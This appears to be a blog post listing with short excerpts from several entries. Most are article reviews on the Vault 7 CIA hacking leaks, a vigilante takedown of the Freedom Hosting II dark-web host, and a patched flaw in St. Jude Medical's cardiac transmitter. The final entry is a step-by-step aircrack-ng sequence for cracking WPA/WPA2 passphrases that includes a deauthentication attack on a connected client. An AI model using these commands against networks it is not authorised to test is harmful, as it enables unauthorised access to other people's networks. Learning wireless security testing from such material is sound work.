Posts

Vault 7: CIA Hacking Tools Revealed: Article Review 18

• The first full part of the series of leaks is called “Year Zero”, with 8,761 documents and files from the CIA’s Center for Cyber Intelligence at Langley, Virginia
• Since 2001 the CIA (famous for its drone and hacker fleets) gained political and budgetary preeminence over the NSA, freeing the agency’s hacking division from having to disclose its controversial ops to the NSA, the primary bureaucratic rival, in order to draw on the NSA’s hacking capacities
• "Weeping Angel", which infests smart TVs, transforming them into covert microphones, was developed by the CIA's Embedded Devices Branch (EDB) with the UK's MI5/BTSS
• Cyber 'weapons' cannot be kept under effective control because they are composed entirely of computer programs and can be pirated and copied with no marginal cost

The following is an example of source code and its notes from a Vault 7 article on how to hack the Samsung F8

Snort for Rookies

Article Review 18: We Talked to the Hacker Who Took Down a Fifth of the Dark Web

· An Anonymous hacker took down the server Freedom Hosting II, which was a hosting provider for 20% of all dark web sites
· Initially didn’t want to take down FH2, but after allegedly finding several large child pornography sites using more than FH2’s stated allowance of 256MB per site, decided to take it down. Ten child pornography sites had 30GB of files, implying that these sites paid for hosting and the admins knew of the illegal sites.
· It took 21 steps to take down
· The hacker released a dump of system files from FH2 but not user data.

The Feds have tried to identify individual users by deploying malware to grab visitors’ IP addresses because, even when in control of a Tor hidden service, law enforcement can’t usually see the location of each user.

Summary: There are vigilante hackers taking down child pornography sites on

St. Jude Medical Patches Cardiac Machine's Cybersecurity Flaw Article Review

1. St. Jude Medical created a software patch following the U.S. FDA’s warning that their Merlin@home Transmitter, which communicates with cardiac devices, could be hacked
2. The transmitter wirelessly sends data on the patient with the implanted cardiac device (like a pacemaker) to a physician over their Merlin.net patient care portal
3. Without this patch, a hacker has the capability to modify the commands in that implanted device, administer unnecessary pacing or shocks, and rapidly deplete the battery
4. The FDA says that “the health benefits to patients from continued use of the device [Merlin@home Transmitter] outweigh the cybersecurity risks”

Summary: I thought it was interesting to find that now the FDA is getting involved in cybersecurity issues because of the ramifications of hacking medical devices. We will definitely be seeing more of these software patches released in the following months. Hackers are generally financially motivated and wouldn’t have an interest in ha

Reference 1 for Cracking WPA/WPA2

To recover the pass phrase from a WPA/WPA2 (TKIP) secured wireless network where the topology includes an Access Point and at least one connected client, use the following commands:

sudo airmon-ng start wlan0 (create a monitoring interface)
sudo airodump-ng mon0 (locate the wireless network and obtain information used to recover the WPA Passphrase)
airodump-ng --bssid 00:1C:F0:AE:83:F8 --channel 1 (present info only for the network of interest)
aireplay-ng -0 15 -a 00:1C:F0:AE:83:F8 -c 00:27:19:FF:F3:14 mon0 (launch a de-authentication attack against the connected client)
airodump-ng --bssid 00:1C:F0:AE:83:F8 --channel 1 --write WPAattack mon0 (recover the passcode)
aircrack-ng WPAattack -w /home/attacker/passlist.txt (tell aircrack to launch the dictionary attack with the library)

Summary: Be safe. These commands allow the user to access pass phrases for the WPA/WPA2 wireless networks. Though WPA/WPA2 is significantly more